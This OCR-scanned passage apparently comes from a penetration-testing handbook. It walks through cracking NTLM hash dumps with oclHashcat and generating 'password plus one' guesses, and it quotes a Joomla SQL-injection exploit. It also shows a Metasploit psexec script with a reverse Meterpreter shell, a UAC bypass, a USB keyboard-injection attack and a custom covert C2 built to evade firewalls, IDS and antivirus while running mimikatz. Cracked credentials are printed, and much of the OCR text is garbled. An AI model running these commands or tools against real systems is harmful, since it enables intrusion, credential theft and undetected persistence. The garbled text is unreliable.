lists\10k_and_scraped_passwords.txt 

The new file size is now 61GB. This shows that the file sizes grow exponentially and can get 
extremely large very quickly. What if we run the 10-12 character Prince-generated wordlist against 
our DC hash dump? 

• oclHashcat64.exe -m 1000 hashes\hashes.lst ppl0_12.txt -r rules Uns idePro- 
HashManager.rule —force 












Prince - Password Cracking 


The hash output recovery went from 11790 to 11920 in 43 minutes. Although these aren’t significant 
gains, these could be the passwords that we really care about. One interesting note is that on a lot of 
different pentests, I have noticed that users who have extremely long passwords usually have higher 
privileges. Usually, someone in the IT or Security groups will with the most permissions. 


The last example is that we can actually pipe the results from Prince processor straight into 
oclHashcat. Let’s look for words between 13 and 14 characters and run the InsidePro-HashManager 
rule against those words. 


• princeprocessor-0.19\pp64.exe —pw-min=13 —pw-max=14 < 

lists\10k_and_scraped_passwords.txt | oclHashcat64.exe -m 1000 hashes\hashes.lst -r 
rulesMnsidePro-HashManager.rule -force 































lh7S55Bf?al*M33c6a02666ffM2SI]! 
btc V-a*j1 bib jleic bHJccflVb^lhhl'ti 1 f>f bt!: 


SejsioFi.Nane,,,: oclHftihcat 
Status,,..,....: Akrted 

Rules. Typo. ' File (mlesMniidcPrc Has Manager, rule) 

Input.Hade,..,,; Pipe 
Hwh.lwflet*,..: File QHuhesMwihes + 1st> 

Hash. Type. .: NTLH 

Tine.Started...: Sun Jan 18 12:02:2? 2015 <42 mins, 10 secs) 

Speed.GPU.li...: 626?.2 HUA 
Speed. GK02,,,: 4987.3 MH/s 
Speed.GPU.I«„ ( : 11254,5 HH/s 

Bettered...,,.: 11955/21318 <56.08^> Dibits, M <0.00:0 Salts 
Progress.......: 30157428359168 

Skipped..,...,.: 0 
Rejected,,,,,,,: 0 

HMhn.GPU.li.,.: m Util, 69c 1 m. N/A Fan 
HHbn.GPU.t2...: ft Util, 70c lenp, H/fl Pan 

Started: Sun Jan 16 12:02:29 2015 
Stopped: Sun Jan 18 12:44:40 2015 

G:^3crs\cheetzSllotinload5\oell‘laikat-1.32)princep) i oce55or 0.l9Spp64.exe pw-nin-13 
shes.lst -r rulesXlncidePro-UasliHana^er.r-uio —terce. 


Prince - Modifications 


After about 40 minutes, we have gone past the 56% rate. So in the total of 2 hours, we have cracked 
about 12,000 out of the 21,000 password hashes using all open source and readily available 
information. Taking it to the next step would be to focus on the targeted employees, pull additional 
password dumps, and lastly start brute forcing. 


C:\oclHashcat-1.32>.\hashcat-utils-l.l\morph.exe lists\crackstat_realhuman_phill.txt 20 3 3 12 > 
testrule.txt 


C:\oclHashcat-l.32>oclHashcat64.exe -m 1000 hashes\hashes.lst lists\crackstat_realhuman_phill.txt - 
r testrule.txt —force 










Morph Example 


Now, we are going to go against the large crackstation password list. 


• oclHashcat64.exe -m 1000 hashes\hashes.lst 

\Users\cheetz\Desktop\Kali_Share\realuniq.lst -r rules\rockyou-30000.rule —force 



























40d6diG794eBf2dd578971fric8m36e: 
IjIjI ia 1 &5997ii.td71dl3228723G2ci 13ci:c - 


INFO: approaching final kfiyspace, workload adjusted 


Session.Name...: ociHasJicat 

Status.. Exhausted 

Rules .Type,... File <mlfcsSrnckyou“]0000 t rule) 

\ nput,Hode.; File (SUsersVchee fc 2 \De&]it np\Ka U JJhareVea Lun iq,1st) 

HasLTarget File (hashes Stashes. 1st) 

Hash.Type.,,...: NILH 

T me .Started.,.: Hon Feb 02 23:192015 (S3 mins, 7 secs) 

Tine.Estimated.i 0 secs 
Speed,GPU.#!..0 H/s 
Speed.GPU.#2 ...i 2366,3 kH/s 
Speed.GUI2366 J kH/s 

Recovered,.....: 14275/21318 (66,96*) Digests, 0/1 <0J0/> Salts 

Progress.: 35905300320000/35905300320000 <100.00*) 

skipped.,.,....: < 0 . 00 *) 

Rejected..0/35905300320800 <8.00 k> 

HUKun.GPtl.lt!... J l&x Util, 67c Temp, H/fl Fan 
HUHon.GFU.lt2.,,; fla Util, 70c Temp, N/fl Fan 

Started: Hon Feb 02 23:19:55 2015 
Stopped: Tue Feb 03 00:13:04 2015 

Ci\ll5ei i £SthectiiNDiiwnloads\oclHashcat-1.32>delHashcat64.exe -id 1000 tashesSta 


oclHashcat - Results 


After about four hours of cracking, we are almost at 70%. This is just a start on how I approach 
password cracking. Usually, I will go after more custom passwords and try more complex rules to get 


to that 90%+. 


Retesting Passwords : What if after a test, they change all their passwords? What if we increment 
their old password by a value of 1? 


• oclHashcat64.exe -m 1000 hashes\hashes.lst —show > password_list.txt 

• type password list 

• testl:509019:aad3b435b51404eeaad3b435b51404ee:64fl2cddaa88057e06a81b54e 

• test3:498809:aad3b435b51404eeaad3b435b51404ee:523971d356ffcaaa96cfb6959'/ 

• test4:496638:aad3b435b51404eeaad3b435b51404ee:4636190bde3bb52ad2d29ca3' 

• test5:520315:aad3b435b51404eeaad3b435b51404ee:b8ffa37b7c490aaf0e5661fad3 










There have been penetration tests where I compromised a domain and was successful in 
pulling/cracking hashes. The client patched all the findings, reset all the passwords of those users, 
and asked for a remediation test. 


After testing and validating that everything was fixed, I took it one step further. I wanted to make sure 
that the users didn’t just change their password by incrementing by one. We have seen a ton of 
password breaches and leaks in the past and we want to make sure that users are smarter than just 
incrementing by a single number. 


I have developed Password Plus One that takes the output from oclHashcat and regardless of special 
characters, increases the last integer by one. For example, if the passwords is i<3turtles09, the new 
password generated is i<3turtles 10. 


If we take our last output and we read the hashes, it will look something like: 
root@kali:/opt/Password_Plus_One# cat /mnt/hgfs/oclHashcat-1.32/password_list.txt 

• jsmith: 1: :64fl2cddaa88057e06a8 Ib54e73b949b::: :Passwordl 

• plee:2:: f9671733342b 19ec0753bd34892cc4c3::: :Nina2014 

• ssmith:3::176b4c6fbb0a54cd5a693b57fe887465::::i<3turtles09 

• jwatts:5::9f00b7969b887b7e21a736c09328d083::::TodayisToday 

• bj ones: 6:: d3b4e97bb63 7cd629ef5b9 f5 d7bd5064:::: T oneth2$ 

We want to run password_plus_one on our large password list: 

• cd /opt/Password_Plus_One 

• python ./password_plus_one.py 

o Enter the location of the oclHashcat output 

o A new file will be created with a list of Usernames/New Passwords 
to new_password_list.txt 



:/opt/Password Plus One# python password_plus_one.py 


I _/ _l I_ I I 

II /_ _/ I I 

I_I U l_l 


Password Plus One | A tool for oclHashcat output manipulation. 
Written by Peter Kim <Author, The Hacker Playbook> 

<CE0, Secure Planet LLC> 


[*]Description: This tool takes the output generated from oclHashcat and increments the digi 
[*)To create the input file from cracking: oclHashcat64.exe -m 1000 hashes\hashes.lst --show 
(*]Example Format: test 1:509:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b94' 


Location of Password List in oclHashcat Format: /mnt/hgfs/oclHashcat-1.32/password_list,txt 

User:Jsmith,Old Password:Passwordl,New Password:Password2 

Jllser:plee,Old Password:Nina2014,New Password:Nina2015 

jUser:ssmith,Old Password:i<3turtles09,New Password:i<3turtlesl0 

jUser:jwatts.Old Password:TodayisToday,New Password:TodataisToday 

User:bjones,Old Password:Toneth2$,New Password:Toneth3$ 

juser:esmith,Old Password:Crazyer$4,New Password:0raiyer$5 - 

[User:ttomson,Old Passwo rd: January 1’, New Passwo rd:January2! 

|User:hkim,Old Password:wha6ttheheck,New Password:wha7ttheheck 
User:kfind,Old Password:Michelel!,New Password:Hichele2! 

User:fname,Old Password:Babyboss!,New Password:Babyboss 1 
User:whoami,Old Password:*Panzer5345’,New Password:*Panzer5346* 

[user: moved, Old Passwo rd: Hu ffin08, New Password: Mu ffin09 
:User:pjacobs,Old Password:Hackerl23,New Password:Hackerl24 
User:dsmith,Old Password:Password928,New Password:Password929 
User:«iike,Old Password:Password8,New Password:Password9 
|User:ccraig,Old Password:Postersl0 ( New Password:Postersll 
(*|Finished 

|[*]Usemame/Password list saved to new_password_list.txt_ 


P+1 - Password Modification 


Now, you can feed this into a brute forcer for web applications, SSH, or even Outlook Web 
Application (OWA). On decent sized clients, this attack usually leads back into multiple accounts and 
into the company. 


Vulnerability Searching 


A huge part about being a pentester is being able to find vulnerabilities in applications and services. 
From the Nmap scans, vulnerability scans, and from poking around, you will identify all sorts of 
versions for these applications and services. 


Generally, I will take the results from Nmap banners and the vulnerability scanner and query the 
identified versions of the applications against the following sites/tools to find exploits: 


Searchsploit (Kali Linux) 



Searchsploit is a default query tool that will search through publicly known exploits based on a 
search string you provide. You can provide part of the title or application to find an exploit. There 
are a good number of exploits here and most of them have code or scripts ready to run. One thing I 
want to strongly urge is to make sure that you test them in a lab environment before testing them on 
production systems. 

On your Kali host, run searchsploit. 


Application* PU<»* X uJ 


Frt Oct 11. 7:39 PM 


I Accossonot 
flocirontrs 

4 GrsphK* 

A Internet 

II Office 

>% Progrjrrmng 
H Sound & Video 
Syitem Tool* 
^ Unwer Access 


rootQkali 


i tl«lp 


Top 10 Security Tools 

^ Information Gathering 
Vulnerability Analysis 
oO Web Application* 
f Ptlfword Attacks 
y' Wedess Attacks 




Sniffing/Spoding 
Q Mantamng Access 



Searchsploit 


For this example, let's say I found a Joomla site and I want to see if there are any vulnerabilities for 
this application. To query searchsploit, I will craft a query like: 
searchsploit j oomla. 


Joomla Kunena Component (index.php 
Joomla Spider Catalog [index.php 
Joomla JooProperty 1,13.0 Multiple Vulnerabilities 
Joomla Spider Calendar (index.php 
Joomla CMKotlector Component Arbitrary File Upload 
Joomla! <=3,0.2 (highlight.php) PHP Object Injection 
Joomla RSfiles Component (cid parai) ■ SQL Injection 
CiviCRM for Joomla 4.2.2 * Remote Code Injection 
Joomla! <= 3.0.3 (remember.php) ■ PHP Object Injection 
Joomla DJ Classifieds Extension 2.0 - Blind SQL Injection/php/wsbapps/2524B.txt 
Joomla S3 Clan Roster c«iij5danroster (index.php /php/webapjfe/25410.txt 
searehsnloit (oomla > a.out 


/ptip/webapps/22153.pl 
/php/webapps/22403.txt 
/pnp/webapps/23286.txt 
/php/webapps/23782.txt 
/php/webapps/24228.txt 
/pbp/webepps/24351.txt 
/php/wepapps/24851.txt 
/php/webapps/24S69.txt 
/php/webapps/25087.1x1 


Searchsploit Results 


Just from a quick query for Joomla, we currently have 906 different vulnerabilities. Let's take a look 
at one of them to get an idea of what it looks like. One thing to note is that the paths in the results are 






pathed improperly. All searchsploit files are located under /usr/share/exploitdb/. To view the 

vulnerability or exploit code, type the following: 

cat /usr/share/exploitdb/platforms/php/webapps/22153.pl 


:-# cat /usr/share/exploitdb/platforms/php/webapps/22153.pl 
#!/usr/bin/perT 

^Exploit title: Joomla Component com_kunena SQL Injection exploit 
#Google Dork: inurl:index.php?option=com_kunena& 

#Exploit Author: D35m0ndl42 

#Screenshot : http://imageshack.us/f/155/comkunena2.png/ 

#Vendor HomePage: http://www.joomla.org/ 

#Special thanks to Taurusomar 

system("clear"); 

print 

print "♦ Joomla Component com_kunena SQL Injection *\n"; 
print "♦ Coded by D35m0ndl42 *\n"; 

print "***♦*♦****+***++*+**♦♦+**♦*++++++*++*+*+++ 
sleep 1; 

use LWP::UserAgent; 
print "Enter the target --> 
chomp(my $target=<STDIN>); 

$code="%25%27%20ancf%201=2%29%20union%20select%201,%20coneat%280x3a,us 
0x3a,activation%29,%27Super%20Administ rator%27,%27email%27,%272009-11 
$agent = LWP::UserAgent->new() or die "[!) Error while processing"; 
$agent->agent('Mozilla/5.0 (Windows NT 6.1; W0W64; rv:7.0.1) Gecko/20 
$host= $target. "/index,php?option=com_kunena&func=userlist&search=". 
$ok = $agent->request!HTTP::Request->new(GET=>$host)); 

$okl = $ok->content; if ($okl =-/([0-9a-fA-F]{32})/){ 
print "[+] Password found --> $l\n$2\n"; 


22153 Perl Joomla Exploit Example 


The 22153.pl is a Perl script to perform an SQL injection against a certain version of Joomla. If 
successful, the Perl script will return the password of the administrator. 


Bugtraq 

f http://www.securityfocus.com/bid J 

Security Focus’s BugTraq is an excellent source for finding vulnerabilities and exploits. You can 
search vulnerabilities by CVEs or by vendor/product types at: http://www.securityfocus.com/bid. 

In the example below, I was looking for some Adobe ColdFusion exploits and seemed to have found 
quite a few. 





www security!ocus.com/bld 


Q Disable * X Cookies » /•' CSS » ■ Forms » S Images • / Information * if# Miscellar 

CL- SecurityFocus " 


Symantec Connect i 

A technical community for Symantec customers, end-users, developers, and partners. 


Vulnerabilities 

Vendor: Adobe _ «J 

Title: ColdFusion : 

Version: Select Version : 

Search by CVE 
CVE: 

Submit 

Adobe ColdFusion CVE-2010-5290 Authentication Bypass Vulnerability 

http://www.securityfocus.com/bid/6269S 

Adobe ColdFusion CVE-2013-0632 Authentication Bypass Vulnerability 

2013-08-20 

http://www.securityfocus.com/bid/57330 

Adobe ColdFusion CVE-2013-3349 Remote Denial of Service Vulnerability 

?nn.n7.nQ _ 

BugTraq 



Exploit-db 

t http://www.exploit-db.comL l 


This site has definitely grown and I really see this site as the replacement of the good of milwOrm. 
Many researches will post their exploits and research to Exploit-DB, which is completely 
searchable. I recommend that you spend some time on Exploit-DB as it is a great resource. 
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Exploit-DB 


Querying Metasploit 


You can't forget Metasploit as a great resource for finding vulnerabilities. 

• On your Kali host, in a terminal type: msfconsole 

• And to find an exploit or auxiliary module, type: search [what you want to find] 


In the following example, I search for all ColdFusion modules. 


* ■■ • ■*[ 1195 exploits ■ 115 auxiliary - 2M post 

♦ --*( 312 payloads ■ 30 ^coders • B raps 

sal * starch coldfusion 
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Tips and Tricks 


This section is dedicated to things that didn't really have a place in the other sections, but might be 
able to make your job much easier. 


RC Scripts Within Metasploit 


Since I try to encourage efficiency, some scripts that you should look into are Metasploit's resource 
(RC) scripts. These scripts can be created to help speed up common tasks you might perform. For this 
example, I am creating a script to use the PSExec module, use smart migrate to migrate the 
Meterpreter process into another PID, and set all the fill-in other information required for the attack. 

We will save the following code to demo.re: 

• use exploit/windows/smb/psexec 

• setrhost 192.168.10.10 

• set smbuser Administrator 

• set smbpass_hash_or password 

• set smbdomain_domain_ 

• set payload windows/meterpreter/reverse_tcp 

• set AutoRunScript post/windows/manage/smartmigrate 

• setg lport 443 

• setglhost 192.168.10.3 

To run the script, from a shell prompt enter: 

• msfconsole -r /root/demo.re 



)o :-# msfconsole -r demo.rc 

Large pentest? List, sort, group, tag and search your hosts and services 
in Metasploit Pro -- type 'go_pro' to launch it now. 


+ -- --=[ 1195 exploits - 726 auxiliary - 200 post 
♦ •• ••=[ 312 payloads • 30 encoders • 8 nops 

I*] Processing demo.rc for ERB directives, 
resource (demo.rc)> use exploit/windows/smb/psexec 
resource (demo.rc)> set rhost 192.168.10.10 
rhost => 192.168.10.10 

resource (demo.rc)> set smbuser Administrator 
smbuser => Administrator 
resource (demo.rc)> set smbpass password 
smbpass => password 

resource (demo.rc)> set smbdomain fakeDomain 
smbdomain => fakeDomain 

resource (demo.rc)> set payload windows/meterpreter/reverse_tcp 
payload => windows/meterpreter/reverse_tcp 

resource (demo.rc)> set AutoRunScript post/windows/manage/smart_migrate 
AutoRunScript => post/windows/manage/smart_migrate 
resource (demo.rc)> setg Iport 443 

Iport => 443_ 


RC Scripts 


All you have to do after it loads is type: exploit. This script starts up Metasploit, authenticates to 
192.168.10.10 using PSExec, drops and executes the Meterpreter payload, and connects that box back 
to your host to gain a full Meterpreter shell. 


This is a much faster way to prepare your scripts, exploits, and especially handlers. I like to add 
features like auto-migrate or add custom payloads to exploits. 


Windows Sniffer 


There might be times where you might need to start a sniffer on the host system This can be done on 
any Win7 or higher OS with Administrative Privileges, without any additional software. {47} {48} 

• netsh trace start capture=yes overwrite=no tracefile=C:\Users\Public\sniff.etl 

• netsh trace stop 

To convert the etl file to something we can view in Wireshark (.cap file), we have to do the 
following: 


• On Win 8, first install Message Analyzer: 

o http://www.microsoft.com/en-us/download/details.aspx?id=44226 

• Run the command: 

o powershell -exec bypass command "import-module PEF; $s = New- 
PefTraceSession -Path 'C:\Users\Public\OutFile.Cap' -SaveOnStop; $s 




| Add-PefMessageProvider -Provider 'C:\Users\Public\smff.etl' ; $s 
Start-PefTraceSession" 


The output will be located in C:\Users\Public\OutFile.Cap, where you can just open this file in 
WireShark. Remember that by default, it only captures 250MB, so if you need more space, specify the 
MaxSize=<Size> switch. 


So, what do you do after you capture a lot of different network traffic? You need to parse through it. 
We are going to use a tool called net-creds developed by Dan Mclnerney. Net-creds is a tool that 
sniffs passwords and hashes from a pcap file. It will include URLs, username/passwords in cleartext, 
SNMP, SMTP, NTLM, and Kerberos. Since this tool only takes in pcap files, it is important to first 
convert your cap file to a pcap file. I usually do this by loading the cap file into Wireshark and saving 
it back as a pcap. Once we have a pcap file, we can run the following commands: 

• cd /opt/net-creds 

• python net-creds.py -p [pcap file] 


root@kali:/opt/net-creds# python net-creds.py -p OutFile.pcap 
[192.168.1.85] GET next-services.apps.microsoft.com/ 

[192.168.1.85:49764 > 192.168.210.76:21] FTP User: hacker 
[192.168.1.85:49764 > 192.168.210.76:21] FTP Pass: password 
[192.168.210.76:21 > 192.168.1.85:49764] Authentication: authentication successful 
[192.168.1.85:51234 > 192.168.210.76:445] NETNTLMv2: lab::hacker.testlab:! 1223344... 


Bypass UAC 


There are times when you might have an administrative account and a Meterpreter session, but you 
can't become system by using the "getsystem" command. This is most likely because User Account 
Control (UAC) protection is blocking you from running the getsystem command. 


In the past and in the previous book, we used either a custom upload of bypassUAC from David 
Kennedy or used the metasploit module bypassuac. The issue was that it had to drop an executable, 
which would generally spawn a second file as well. I have often seen instances where AV would 
pick up either one of the two files. 


To get around this, I migrated from using bypassuac to using bypassusac injection. This module uses 
the Reflective DLL Injection technique to drop only the DLL payload binary instead of the three 
separate binaries in the standard technique. The reason I switched is because I have had better luck 
evading AV using DLL versus executables. If you need to use a custom DLL, you can always set 
EXE::Custom to your DLL. Let’s walk through an example where you need to get to system quick. 


You might see something like this: 



• msf exploit(bypassuacinjection) > sessions -i 1 

• [*] Starting interaction with 1... 

• meterpreter > getsystem 

• [-] priv elevate getsystem: Operation failed: The environment is incorrect. 


If you do have an administrative account, most likely UAC is blocking execution, which is enabled by 
default. To get around this, you will need to background the current Meterpreter process, use the 
bypassuac injection module, set your options, and run it: 

• meterpreter > background 

• [*] Backgrounding session 1... 

• msf exploit(bypassuac injection) >use exploit/windows/local/bypassuac injection 

• msf exploit(bypassuac injection) > set target 1 

• target => 1 

• msf exploit(bypassuacinjection) > set PAYLOAD 
windows/x64/meterpreter/reverse_https 

• PAYLOAD => windows/x64/meterpreter/reverse_https 

• msf exploit(bypassuac injection) > exploit 


Note that if you are targeting a x64 host, you need to make sure to set the PAYLOAD to a 64bit 
payload and set the target to “1” which is a Windows 64bit OS. 


A Cmsf exploit) 


) > exploit 


l*] 

[+] 

[+] 

1 +) 

m 

m 

[+] 


[*i 

-03 


Started HTTPS reverse handler on https://0.0.0.0:8443/ 

UAC is Enabled, checking level... 

UAC is set to Default 

BypassUAC can bypass this setting, continuing... 

Part of Administrators group! Continuing... 

Uploading the Payload DLL to the filesystem... 

Spawning process with Windows Publisher Certificate, to inject into. 
Successfully injected payload in to process: 1432 
172.16.151.202:53352 Request received for /EWSm... 
172.16.151.202:53352 Staging connection for target /EWSm received... 


Meterpreter session 2 opened 
-06 21:16:37 -0500 



8443 -> 1(72J16.151.202:53 


meter pre ter > background 
[*] Backgrounding session 2... 
msf exploit) issuac injection) > session -i 2 
T-l Unknown command: session. 
msf exploit) ) > sessions -i 2 

[*] Starting interaction with 2... 


ULbU 


meterpreter > getsystem 
...got system (via technique 1) 


BypassUAC 


Now, you can do hashdumps, mimikatz, or any other command that requires system privileges. 


Kali Linux Nethunter 



Every so often, I need to do a little penetration testing on the go. A great portable solution for this is 
Kali Linux NetHunter. 


“The Kali Linux NetHunter project is the first Open Source Android penetration testing platform for 
Nexus devices, created as a joint effort between the Kali community member “BinkyBear” and 
Offensive Security. NetHunter supports Wireless 802.11 frame injection, one-click MANA Evil 
Access Point setups, HID keyboard (Teensy-like attacks), as well as BadUSB MITM attacks.”{49} 

Out of the box, NetHunter works pretty easily with Nexus 5, Nexus 7, or Nexus 10. To install, 
download the NetHunter Installer from: 

https://www.offensive-security.com/kali-linux-nethunter-download/ . 


Run the executable, and follow the install instructions. 


































Installing NetHunter 


Installation is pretty straightforward and once you have it all configured, NetHunter is ready to go. 
Going to the tablet, you will be brought to the screen below. To start using NetHunter, drop into the 
NetHunter App. 
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Nethunter Start Screen 


If we drop into the “Launch Kali Shell in Terminal” we can type “msfconsole” and drop straight into 
Metasploit. NetHunter has a lot of abilities, such as attacking WIFI networks, setting up access points, 
malicious DNS servers, and more. 
































IQQ 

Window 7 

_ A_ 

rootgfcali:-# «sfconsole 
|*) Starting the Metasploit Fraaework console...\ 


3Koa SuperHack II Logon 


Password: | ) 

I OK 1 

http://aetasplolt.pro 



a wa 11:11 
© X : 


Tired of typing set (MISTS'? Click 1 pwn with Metasploit Pro 
Learn aore on http://rapid7.coa/aetasplolt 

•| aetasplolt y4.11.0-2015013101 |core:4.11.O.pre.2015013101 api: 1.0.011 

.•( 1369 exploits - 788 auxiliary - 223 post | 

* -- --•[ 356 payloads - 37 encoders - 8 nops 1 

♦ .. --•( Free Metasploit Pro trial: http://r-7.eo/tryasp j 



Nethunter - Metasploit 


One of the attacks is similar to the Rubber Ducky attack. This attack is called the “HID Keyboard 
Attack” and allows the Nexus device to emulate a keyboard and press keystrokes onto the machine 
once it is plugged into a computer. To access the HID tool, on the top-left menu, we can drop to “HID 
Keyboard Attack.” 


BIO 

Cy NetHunter Android 


NetHunter Home 
Kali Launcher 

Kali Service Control 
HID Keyboard Attack 
BadUSB MITM Attack 
MANA Evil Access Point 
Dnsmasq Service 
Iptables Configuration 


CS HID Keyboard Attack 


UAC Bypass 


This Windows CMD payload allows you to enter raw comm; 
prompt. Hitting the list menu will allow you to choose keyi Keyboard Layout 
options. 


♦ip con fig 

net user offsec HldKey80ard! /add 
net localqro up administrators o ffsec /add 


Execute Attack 
Reset USB 


Update 


Nethunter HID Attack 


You might have to configure the UAC Bypass and once the device is plugged into a computer, just hit 










execute. The great part about this tool is that it is flexible, easy to configure, and quick to use. You 
might be on a physical engagement, where you are walking around the office. You see someone leave 
their workstation unlocked to leave for lunch. You don’t want to be sitting there typing commands on 
their machine. Instead, you might be able to plug your NetHunter device into a USB port and hit 
execute. You wait as it calls a PowerShell Meterpreter script and creates a reverse shell. Another use 
for something like the HID Keyboard Attack is with kiosks. I have seen plenty of kiosks that either 
have a limited physical/virtual keyboard, or no keyboard at all, but have USB ports. This is a great 
attack for just that. 


Building A Custom Reverse Shell 


I did a presentation at one of the LETHAL meetings about problems we sometimes encounter on 
engagements. As we run into more and more complex firewalls, we need to look at things differently. 
One thing I started seeing is application-based firewalls. The idea behind this is that the firewall 
looks at the packets to see if they are communicating the proper protocols on the proper ports. So, you 
can’t run SSH on web ports (80/443) and the company does lull “man in the middle” SSLproxying. 
Therefore, not only do we need to look like the protocols that are specific on ports, but we also need 
to evade any sort of IDS. When I teach, I love to give the doomsday scenario. Let’s say Metasploit no 
longer works, you have lull SSL interception, and IDS work great. What can you do? 


I started building a framework exactly for this. What were my requirements? 

• Bypass application-based firewalls 

• Make everything seem normal to an analyst 

• Be able to have frill control of the host 

• Be able to upload/download files 

• Make penetration testing faster 

• Generate client executables and evade AV 


I built and implemented the communication protocol first. Lrom there, I can build all the modules. The 
implementation targeted the following: 

• Take the Top 500 Words 

• Any C2 communication between client and server 

o Get gzip for compression 
o Get base64 encoded for standard characters 
o Each letter is converted to a word 

• Make sure traffic looks random 

o The same cmd command doesn’t look the same (cmd != cmd) 
o Can’t build standard IDS signatures 

• Utilize system commands (PowerShell, WMI) 

• Python/pyinstaller 


Let’s walk through an example. Let’s say we want to send a “cmd ipconfig” command to get the IP of 



the host: 


Command 

Result 

cmd ipcontig 

cmd ipconfig (no change) 

Gzip Compress Result: 
cmd ipcontig 

x x9cK xceMQ\xcS,H\xc9 ■, xceK ■. xcbL\x07 v ,x 
00\xld\x04\xa4 

Base64 Encode Result: 

x\x9cKxceMQ \ xc3,H\ xce\xctK \xcbL\x07\ 
xO0\xld Vx04\xa4 

eJxLz k 1 RyCxlzs 9LyO w HA B1 fEKQ 

Random Key Generation (1-500) 

20 

Now that we have a base64 encoded string (eJxLz 

cl RyCxlzs9Ly0wHABlfBKQ) and a key of 20, we 


can generate obfuscated packets: 


Take Key (20) Against Top 500 Words and Uppercase 
First Letter 

Where 

First Letter Irom Base64 

(eJxLzklRyCxIzs9Ly0vvHABllBtKQ) and add to Key 
Value 

Cur rent ^Counter - 20 (key) -5- 5 (e is 
the 5th letter of the alphabet) 

Current Counter = 25 

Find the 25th word in Top 500 Words list 

did 

Continue for every letter in the Raseti4 string 

Where did help wonder there would 
give... 


Server Implementation: 

The other requirement was to bypass application based firewalls. To do this, we need to not only 
communicate over a web port, but we need it to look like web traffic. 


Victim 

Server 

Details 

Request: POST Hello Request 

Response: dog cat wool... 

Victim sends Hello and Server 
responds with run ipconfig 

Processes to ipconfig 

Sends POST: Where am foreve 

tomorrow... 

Response: (Empty) 

Victim processes ipconfig and sends 
server nothing back 

Request: POST Hello Request 


Victim keeps sending Hello pings 
until command is given 























Now that we have an understanding of how the clients will communicate to our server, let’s walk 
through the Proof of Concept (PoC). First install the c2 code and create a malicious binary. *Make 
sure to have SMBExec and Veil-Framework installed. These tools will install all the dependencies. 


• git clone https://github.com/cheetz/c2 /opt/c2/ 

• cd /opt/c2/ 

• chmod +x setup, sh 

• ./setup, sh 

• python ./server.py 

• help 

• generate binary [ip] [port] 




Potato 


,13 AO AGA.0 A01 S-iGF 


13i,0±340A&jt3 


IA0A3 AQ.i 


Starting Web Server 
Listening on Port: 
Server IP: 

Ready to accept conne 

♦ ** + **■+ +■*:+ * *"+ Pfr* *:*■’ 


Welcome to Covert Shell - MENU 

Command Summary: 
sessions 
info [host] 
cmd [host) kill 
pwn 

sleep [command] 

post [host] [command] 

gene rate_binary [ip] [port] 

exit 

> generate^binary 172,16-151.128 80 
@ rriwinediag:£ECUR32_initNTLMSP ntlm_ 
h. Usually, you can find it in the wi 
69 INFO: wrote Z:\opt\c2\winword.spec 
90 INFO: Testing for ability to set i 
101 INFO: ... resource update availab 
108 INFO: UPX is not available. 


list all sessions 
print info about a s 
kill specific sessio 
pwn host and return 
change the sleep com 
post exploitation co 
create client binary 


Custom C2 - Building a Payload 











We have generated a binary and it is saved to /opt/c2/dist/winword.exe. This is a python file turned 
into an executable that will communicate back to our server. We can now take that executable and 
move it to our victim system and run it. 


Once a victim has executed the client, you will see the hostname show up on the C2 server. We can 
run a quick help to see what we can do. One example is the info [host] command. If we run info win7, 
we see the all the host information, such as user and system info, permissions, network information, 
netstat, and open shares. 




GROUP INFORMATION 


Everyone 

nabled by default, Enabled group 
BUILTINXUsers 

nabled by default. Enabled group 


me qme 


tan you become, the 

Well-known group S-1-1-0 


Allas 


5*1*5-32 


hacker\testuserl S-l-5-21-3525058729-1821581^66-2040179606-1106 


4467 INFO: Appending archive to EXE Z:\opt\c2\dist\winword.OKe 
> win7;Cennectedv2 wln7 


Welcome to Covert Shell * MENU 

Command Summary: 
sessions 
info [host] 
emd [host] kill 
pwn 

sleep [command] 
post [host] [command] 
generate_binary [ip] [port] 
exit 

> info win/ 

> win7:USER INFORMATION 


exit 


list all sessions 
print info about 
kill specific ses 
pwn host and retu 
change the sleep 
post exploitation 
create client bin 


User Name SID 


Custom C2 - Post Exploitation 

















I also incorporated a ton of the standard post execution commands. Although Metasploit and 
Meterpreter are amazing tools, sometimes it is hard to know exactly what to do next. That is why I 
created the post section specifically for Windows. It will do all the standard Windows Post 
exploitation, such as list patches, list users, list all AD accounts in active directory, pull passwords 
with Mimikatz, bypassUAC, and popcreds. Just type “post” on the server and interact with: 

• post win7 password64 

• This will execute mimikatz on the end host and pull hashes. 




:> win?Connectedv2 win? 
> post 


Welcome to Covert Shell - POST 

Command Summary: 

jcmd [host! [command] command to run on host 

post [host] adjjsens pull all adusjrs -and info from AD 

post [hostI password if the executable was run as admit 

post [host) password^ if the executable was run as admir 

stems 

post [host I get_computer_dGtails get all computer details 

post [host! net view finds all machines on the local dc 

s a long time 

post [host] win_patches list all windows hotfixes 

post [host] list _p rocessas detailed list information on runnj 

post [host] list_users detailed list information on users 

post [host] downloadfile [file] [location] send a file, location is 

post [host] bypassuac32 bypass UAC for 32b it OS 

post [host] bypassuac: bypass UAC for 64bit OS 

post [host] pop_Creds pop up a username /password box to 

calc host calc calc calc calc 

> post win7 passwords^ 

* win?;.#####. mimikatz 2,0 alpha (x64) release "Kiwi en C" (Hay 20 2014 08:56:< 


## / \ ## 
## \ / ## 
'## y ##’ 
1 #####■ 


entillkiwJT{ ben^ 
Ikiwi,oom/miir.ikat 


Benjamin DELPVJ 
http://blog.gent 


ientilkiwi.com ) 


14 modules 


at 2 (powershell] # seHurls. 


mimik 


W^ecome, the more you 


testuserl 

HACKER 

9-1-5*21-3525058729^1821581466^2040179600-1105 


Authentication Id 
Session 
User Name 
Domain 
SID 

msv : 

[00000003] Primary 

* Username : testuserl 

* Domain : HACKER 

* NTLM : 0aa3d0c4aS7962d9356e03480de5ebbe 

* SHAL : 91fd3daOe2455fbld31663b9305e8SIe705a561c 


Custom C2 - BypassUAC and Mimikatz 


You also have the ability to run commands on the end host with cmd [hostname] “command”. More 










importantly than running these commands is: “What does the traffic look like?” Next, let’s look in 
Wireshark to view the TCP stream when we pull hashes in the next example. 
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Custom C2 - TCP Stream Using Words 


As you can see, the client sent what looks to be a very badly constructed sentence and the response 
from the nginx C2 server (not really nginx but python) is a long run-on mix of words. Whether you are 
sending your victim’s files or commands, they will all follow the same structure. 


Think about this for a second: If you are monitoring the network or configuring an IDS, how do you 
detect this type of traffic? Unless you are reading line by line, the traffic looks just like normal web 
traffic. There are no patterns or special characters, and the sentences actually look like sentences (but 
don’t make sense of course). You could be on this host all day long and never be detected. This is just 
